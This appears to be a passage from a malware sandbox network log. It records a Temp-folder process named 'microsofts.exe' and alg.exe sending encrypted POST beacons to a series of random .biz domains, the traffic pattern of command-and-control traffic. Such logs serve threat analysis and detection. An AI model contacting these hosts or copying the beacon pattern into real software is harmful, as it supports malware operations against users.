Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:50.499032021 CET | 358 | OUT | POST /ubujpwkxvgqviqf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.499141932 CET828OUTData Raw: 1e f8 f8 42 b0 f3 34 41 30 03 00 00 6b 06 03 94 37 07 e5 fe ba fa ee 4b cc 2b b4 59 92 f4 93 2c 55 19 61 94 8d f1 20 ae 37 d3 75 4a 15 34 bc 19 fd d8 6d cc 89 06 a0 a7 d6 2d ac be 85 b9 64 5e 61 fd c9 aa 07 cd 61 b2 86 af 2f ea 57 ec e1 ef 68 68
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: B4A0k7K+Y,Ua 7uJ4m-d^aa/WhhBF-tsO>.=g6[uGf*-)@o$*pA:Q5cG_b%qk{85[jE% {{Ckx@}||+mevU\BW{%d$Y"2T5B
Nov 5, 2024 17:03:51.137124062 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 05 Nov 2024 16:03:51 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 59719 | 208.100.26.245 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:51.550123930 CET | 354 | OUT | POST /qgkrosoxeed HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.550165892 CET828OUTData Raw: da 33 9c 6f 81 9e 7b ba 30 03 00 00 c6 ed 31 08 39 18 d8 7e 30 a4 e3 a1 84 57 78 f5 2a 9d 80 ca e7 67 de d3 a0 44 e1 8c bb ea 7a a1 80 8b 0c 0e 7a d9 7d 30 ff 8c 08 85 8c 8d 24 31 5d 2c ab 0e c0 30 09 23 b1 19 31 ca 6c 3a 27 aa fa cc fd 90 61 da
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 3o{019~0Wx*gDzz}0$1],0#1l:'a;o=$4B{(+fYagmm} 0AV\8Py1O3|!r7lUG[fq[4\8~IW!@=xIAahnf{zW
Nov 5, 2024 17:03:52.178833008 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 05 Nov 2024 16:03:52 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 59721 | 13.251.16.150 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:51.765412092 CET | 359 | OUT | POST /gkytxybgvmhelx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.765472889 CET778OUTData Raw: eb 85 68 da 9f b4 3a 8a fe 02 00 00 9a dc 0e 27 8d 35 86 7a 8f b8 e2 ce 3d ea 62 6d a8 d6 b2 73 57 03 e3 79 59 e3 a4 5a 7d c3 a8 65 7c ae 98 eb 98 d5 47 af 64 96 f2 bf 74 c1 bf 48 ec 6e d7 c7 8d a7 73 21 f1 de a2 1c d0 ad e6 0e 79 cf 66 76 21 c4
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: h:'5z=bmsWyYZ}e|GdtHns!yfv!|1n\eq'Sou0W6/x1_p)~?KE_?G[-jSFXg*fp?lN,52P/\Kw4qIdh6`"Gv`mmX
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:53.183126926 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d27e0a0d76f55987c36d3accf2e38c3e|173.254.250.76|1730822632|1730822632|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 59724 | 34.211.97.45 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:52.260205984 CET | 357 | OUT | POST /yiteaphcawxhusdi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:52.260205984 CET | 828 | OUT | Data Raw: a0 48 09 8f d0 02 3a 17 30 03 00 00 44 dc 7e f3 c6 6f a2 51 e5 da bf 51 56 e6 f0 85 39 2d 81 93 0e 36 c4 1d f1 a6 b7 19 ba 27 78 00 85 64 76 db 63 a9 e3 21 a8 d0 d1 df d9 d9 73 c4 b5 ef 00 34 ec 8b ce 45 34 16 a0 c6 2f 69 32 01 7a f9 8c 8b 69 c3
Data Ascii: H:0D~oQQV9-6'xdvc!s4E4/i2ziC2xYPara=zve$*MRwDX +r@3Tb<d"8jP5-(!Yi2T1us]^0x$$Ki{`~N.Hc*r}$H]
Nov 5, 2024 17:03:53.097253084 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=54327b8fe647579beadac5add3b7cfdd|173.254.250.76|1730822632|1730822632|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 59729 | 54.244.188.177 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:53.153350115 CET | 357 | OUT | POST /nfkiqboumamba HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:03:53.153378963 CET | 828 | OUT | Data Raw: 10 7b 14 f3 c7 a4 ed a5 30 03 00 00 f6 91 ec c5 1e e4 af fa d4 78 d8 54 6f 67 20 59 49 3d d1 52 9d 14 c7 3e 3c 2b f0 d4 42 ef fe fa 4c 65 49 df db ca 82 09 60 fd c8 b8 e3 9e f8 2d e4 7e 9c 87 d2 15 4b 54 29 a4 55 de 16 dc 4f ef 44 d8 6d 68 05 fd
Data Ascii: {0xTog YI=R><+BLeI`-~KT)UODmhcUU53^hY~=(jq9CO51G*"agZ?POf:&_3Z;$8sJD~+mMIWcS2/"EL9X%5h{4(WY~0xg4#
Nov 5, 2024 17:03:54.013762951 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5f59da6435ead878fc8a406359f18e14|173.254.250.76|1730822633|1730822633|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 59732 | 34.211.97.45 | 80 | 1492 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:53.426381111 CET | 349 | OUT | POST /cgfpu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:53.426398039 CET | 778 | OUT | Data Raw: 8a 74 24 3d 1f e3 8d 20 fe 02 00 00 52 20 82 d7 3b 10 25 50 f5 1b b5 a2 99 54 39 f3 88 f0 2d 3f f7 ef 9c 0f bc 47 56 11 42 fe c6 07 5b 45 79 c4 9b 95 75 67 90 b4 97 0f 7c e0 30 01 af d7 46 a9 94 dd be 9c 33 77 f5 ab de 84 19 43 37 e0 a0 ee c5 4f
Data Ascii: t$= R ;%PT9-?GVB[Eyug|0F3wC7O+6y_;1< L4(y2&b@0Kfvj&Kc+Ae-dZE(I(x7qOH(@52a_twkh+{kCdhhVcdd0|UW*B
Nov 5, 2024 17:03:54.263894081 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6f4c841b9c9407f453a53c5be0e2e896|173.254.250.76|1730822634|1730822634|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
73          192.168.2.5  59737        18.141.10.107   80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:54.178164959 CET  355  OUT  POST /kfabynhosjjh HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: wllvnzb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:54.178214073 CET  828  OUT  Data Raw: c1 ea 0f b4 b6 4a 75 34 30 03 00 00 ee 9a 04 92 6c c1 0b 3f d7 1a 01 79 b0 2c c5 49 39 13 fc cb c7 a8 9c 3b fb 2e 2a a9 3d a8 8f 22 25 17 5e 1f 1b 0f de 51 b1 5f 68 74 36 f6 b9 03 ae f3 a0 c8 df 25 f4 66 25 c0 97 c1 ee cc b1 62 cb ce 8e 17 9c 8e
    Data Ascii: Ju40l?y,I9;.*="%^Q_ht6%f%b=pS U1=6RZ^BCK^8c>t$waMhhskQ]_'E7obXrJ^n|J5.ZzbJ(n@KW#B.a[;fK>qy~
Nov 5, 2024 17:03:55.591325998 CET  415  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b1d397a78e5ee993aa7837bbc6d540ea|173.254.250.76|1730822635|1730822635|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
74          192.168.2.5  59742        47.129.31.212   80                1492  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:54.595113039 CET  347  OUT  POST /wcjgm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ftxlah.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:54.595180035 CET  778  OUT  Data Raw: 95 a1 68 03 4f 41 57 01 fe 02 00 00 ba cd 13 d7 2c e9 c0 a5 83 06 fe 75 7e 60 26 09 4a 05 00 5b d5 ec a7 ed 99 6e 52 34 1f ac 1a ef 44 37 5d 97 95 98 64 8f 4f aa 3c c1 4c 6f 51 b9 17 ee 35 bd aa 2e 7c df 43 1c 1f f8 17 cd eb 5c 6a fd 8a 5a 22 e8
    Data Ascii: hOAW,u~`&J[nR4D7]dO<LoQ5.|C\jZ"hPBS6:I.uaeg50aRv[IPw9 [FXS!2d*qvng-rRYSFMuqYxH< EE
Nov 5, 2024 17:03:56.039856911 CET  414  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a53f54a9e1486462d609c74ebe29a9f0|173.254.250.76|1730822635|1730822635|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
75          192.168.2.5  59743        18.208.156.248  80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:03:55.651700974 CET  353  OUT  POST /uayanvrydqdv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gnqgo.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:55.651720047 CET  828  OUT  Data Raw: 7b ec 30 cd 2c 1b 16 fe 30 03 00 00 ba be 67 42 96 50 8d 3e 4f 1c e9 26 7f ed 89 c4 70 7c 73 7b 34 6f 7d 31 d8 32 6e e8 77 9b 57 88 54 82 2e eb 39 ff 42 fc 4d f0 ab 1a 1c 01 60 86 2a 10 8d 4a 28 88 87 12 9d 76 20 0e 57 40 18 43 3c 30 fc 70 a2 66
    Data Ascii: {0,0gBP>O&p|s{4o}12nwWT.9BM`*J(v W@C<0pf;<hUU+?CP!^y7a<Lec]Vxh4f(7O]ERtEd.EY"6YDa)lJO/(#*V&OQ>5'/VVJT&
Nov 5, 2024 17:03:56.321914911 CET  413  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:56 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=7cb36427558f8e0df1517c553297aecc|173.254.250.76|1730822636|1730822636|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              76192.168.2.55974413.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.390496969 CET347OUTPOST /nuxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.390522957 CET778OUTData Raw: c9 d2 19 11 ef 73 42 b2 fe 02 00 00 f9 51 de 5f ce 5f 24 d3 77 d2 67 f0 e3 82 ae 93 9d 60 f4 b3 a3 42 ec d3 09 cd be 9e 2e ec 92 8e 69 24 74 c1 c2 24 38 78 e7 ab 48 06 d1 c7 83 0c 2c a3 72 34 6b c9 d3 14 d9 cb 56 8b 2d b6 94 54 2b fd 8f c3 9a 9f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: sBQ__$wg`B.i$t$8xH,r4kV-T+3$XoQTLL!tVXFp=?WPAloEr|VwtUipEYGRc~;;wR>1P[OZ6[\Fve3co
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.803448915 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=aaf54b1fdd9531f6778e5ea9363347a4|173.254.250.76|1730822637|1730822637|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              77192.168.2.55974544.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.395634890 CET350OUTPOST /qunybk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.395669937 CET828OUTData Raw: 35 29 07 31 95 36 99 8b 30 03 00 00 e0 c6 0f ec 42 6e 21 03 ec 2c ba b6 75 23 98 d9 04 4d d2 bf bf 09 6e 4a 44 f0 7d 25 2b 5c d1 0d 7f 60 f4 ab 08 74 12 28 1a 49 b2 ff 42 3a 99 bc ad 7f 6a 96 a1 c7 97 36 42 48 dd f3 72 38 4f 88 33 22 ca 86 ce 7b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5)160Bn!,u#MnJD}%+\`t(IB:j6BHr8O3"{Ozp [vO%QRdrY+a(FRt7F&Fjs.KY)5q@C"gQNK{{&xaZ|hkgV)'tpB:a
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.081610918 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f46b4041a40b159a8f82b183774e390f|173.254.250.76|1730822636|1730822636|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              78192.168.2.55974618.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.218492985 CET346OUTPOST /gu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
